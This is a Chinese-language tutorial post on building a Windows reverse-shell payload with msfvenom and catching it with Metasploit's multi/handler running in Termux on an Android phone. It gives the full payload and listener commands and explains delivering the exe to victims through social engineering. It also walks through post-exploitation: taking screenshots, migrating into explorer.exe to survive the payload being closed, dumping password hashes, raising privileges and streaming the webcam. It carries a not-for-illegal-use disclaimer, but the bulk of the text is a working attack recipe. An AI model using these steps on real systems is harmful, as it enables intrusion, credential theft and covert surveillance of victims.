使用安卓手機Termux終端,建立有效載荷遠程控制windows電腦

本文僅用於討論網絡安全技術,以保護信息安全為目的,請勿用於非法用途!

使用安卓手機Termux終端,建立有效載荷遠程控制windows電腦

測試清單

1、一臺已經安裝好Termux的安卓手機。

IP是192.168.31.156,也可以輸入ifconfig查詢!

2、務必保證Termux已經安裝好滲透測試框架Metasploit

沒有安裝的可以關注作者、獲取安裝方式,註明來意。

3、win7靶機,不需要知道ip

同一網段(比如都在同一路由器下的wifi環境)

安卓手機不能息屏,也不能退到手機桌面,一直要保持Termux手機終端頁面。否則後面的meterpreter會話就會自動斷開。

使用安卓手機Termux終端,建立有效載荷遠程控制windows電腦

msfvenom

msfvenom是metasploit-framework框架的一個生成載荷的工具。支持眾多系統、語言和載荷,我們可以使用這些生成的載荷用於攻擊和控制遠程的任何電腦(包括安卓手機)。

Termux運行msfvenom

msfvenom

基本options:

-p, --payload <payload> 指定需要使用的payload(攻擊荷載)。使用msfvenom -l payload查看所有支持的攻擊載荷!/<payload>

-l, --list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: payloads, encoders, nops, all

-f, --format <format> 指定輸出格式 。msfvenom -l format查看所有支持的輸出格式!/<format>

-h, --help 查看幫助選項

生成有效載荷必須要指定兩個必要的選項參數:-p,-f

那生成可執行載荷(本課就是生成一個名為lala.exe的windows文件)有什麼用呢?

目的很簡單,就是將生成的有效exe載荷發送到目標電腦上(win7靶機),然後運行它。此時Termux中的Metasploit監聽端就會受理連接,從而實現控制win7!

使用msfvenom生成有效載荷

Termux終端下執行:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.156 lport=6666 -f exe > lala.exe

注意:Termux生成的payload,windows電腦運行後,無法建立meterpreter會話!實測,只能使用kali系統終端執行該命令。(kali安裝請關注作者,獲取安裝方法!)

然後在kali的終端下輸入:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.156 lport=6666 -f exe > lala.exe

-p指定有效載荷(exe)使用的攻擊載荷、lhost 我們安卓的ip(回連到我們安卓,需要知道一個明確的安卓ip地址)、lport 定義安卓的一個高端口、-f指定輸出的格式exe、 >輸出符號,最終形成以lala.exe命名的可執行windows程序!(每一個都有一個空格!)

使用安卓手機Termux終端,建立有效載荷遠程控制windows電腦

設置Termux監聽、部署載荷程序

關於部署:上面創建好的可執行程序lala.exe,你可以將它通過社工等方法(發送、轉存、下載)提供到目標電腦上,我們這裡僅僅用作教學演示,直接將kali系統生成的lala.exe載荷,拖到win7物理機,切勿用於非法目的!

要想測試實驗正常進行,首先你要在Termux上開啟metasploit監聽!

首先Termux終端下輸入命令:

msfconsole

此時就會開啟"metasploit"!


使用安卓手機Termux終端,建立有效載荷遠程控制windows電腦

然後配置Termux 中的metasploit準備監聽載荷回連:

msf> use exploit/multi/handler (1)

set payload windows/meterpreter/reverse_tcp (2)

show options (3)僅僅是顯示查看,可以不輸入

set lhost 192.168.31.156 (4)

set lport 6666 (5)

run (6)

(1)表示使用一個用於接受遠程回連會話的攻擊模塊;

(2)設置與上面(msfvenom)創建的有效載荷一樣的載荷payload;

(3)顯示設置參數:執行這個載荷需要設置的參數,一般要設置kali的ip和端口,但要和前面msfvenom設置的ip、端口一樣,所以就是設置(4)(5);

(6)就是執行該監聽端!

運行如下圖:【*】started reverse TCP... 代表我們安卓手機正在監聽本地的6666端口,等待win7的載荷程序發回的回連數據!

現在還沒有回連,因為我們的lala.exe.載荷還沒有發到win7靶機上。

使用安卓手機Termux終端,建立有效載荷遠程控制windows電腦

以上就完成了termux的監聽,還沒受理連接。

通過Termux控制win7靶機

回到電腦端虛擬機kali系統,打開左邊菜單欄中的第一個圖標,將這個主文件夾中的lala.exe直接拖到win7靶機。

使用安卓手機Termux終端,建立有效載荷遠程控制windows電腦

選中kali主文件夾中的lala.exe,拖到win7電腦桌面即可,相當於部署了載荷文件。

當然實際中,你需要他人下載它!

使用安卓手機Termux終端,建立有效載荷遠程控制windows電腦

拖拽完畢,kali就不需要再使用了,下面只是win7和安卓手機termux的關係。

假如對方在win7上雙擊運行了這個lala.exe,我們的Termux就會自動成功受理連接。

我們已經看到termux產生了meterpreter>字樣會話,說明已經獲得了遠程靶機win7電腦的控制權!這個就叫meterpreter會話

使用安卓手機Termux終端,建立有效載荷遠程控制windows電腦

注意:開頭講過,手機必須保證在termux終端頁面,不能退出,息屏,斷網!如果meterpreter會話died,斷開了,請再一次輸入run命令執行監聽,再次雙擊win7的lala.exe即可建立連接!

輸入"?",即可查看所有可以控制win7電腦的命令。

使用安卓手機Termux終端,建立有效載荷遠程控制windows電腦

1、比如,遠程桌面獲取命令"screenshot"

Meterpreter下輸入:

screenshot

成功獲取win7的桌面截圖,文件保存在/data/data/com.termux/files/home/neynpGgM.jpeg,這個就是圖片。

使用安卓手機Termux終端,建立有效載荷遠程控制windows電腦

Termux是無法直接查看圖片樣子的,而且Termux中的文件目錄都是Termux私有的,無法通過手機文件管理器直接查看,也無法複製、粘貼到其他設備!

解決辦法是:關注小白嘿客、私信回覆“Termux文件處理”,即可解決“如何將Termux中的文件、圖片上傳到電腦端進行查看使用!這裡略!”

但是,可以肯定的是,通過screenshot命令獲取win7靶機的桌面圖片肯定是存在了的!

2、載荷lala.exe進程轉移

如果只要對方關閉那個lala.exe,比如在內存服務中關閉了它!那麼我們Termux的meterpreter就會斷開,所以務必要及時進行遠程進程遷移。

Meterpreter下輸入:

ps (顯示對方電腦的進程列表)


使用安卓手機Termux終端,建立有效載荷遠程控制windows電腦

然後找到"explorer.exe"這個程序以及對應的第一個ID號,因為這個explorer.exe是win7電腦的正常運行必須的程序,除非對方電腦關機了,不然這個程序是不會自動關閉,所以我們利用這個特點,將我們的載荷進程遷移到這個explorer.exe的進程ID 3116中。

Termux 的Meterpreter中繼續輸入:

migrate 3116 (一定是explorer的第一個ID號)

此時即可完成載荷進程遷移!

使用安卓手機Termux終端,建立有效載荷遠程控制windows電腦

  • 輸入"?"命令查看的所有控制命令,這裡不再一一講解,加入作者的《安卓嘿客訓練營》,就可學習!

ls:查看遠程靶機的文件、upload上傳本地手機文件到遠程win7;

download:下載遠程win7電腦的文件到安卓手機、sysinfo查看遠程win7的系統信息;

getsystem:提升termux在遠程win7電腦的權限、cd在遠程win7上切換目錄;

hashdump:下載對方的hash文件;

webcam_stream:獲取對方電腦的實時攝像頭;

到目前為止,我們已經學會了使用msfvenom來創建可執行的有效載荷exe文件。我們需要提前在Termux端設置好相關的監聽,此時只要通過一些方法讓目標電腦執行我們的exe文件即可,我們的Termux偵聽端就會成功受理會話,控制目標電腦!

安卓嘿客我想說

更多關於

kali滲透、web滲透、安卓滲透等技術,關注作者—小白嘿客,私信獲取。歡迎在下方評論區留言討論!


分享到:


相關文章: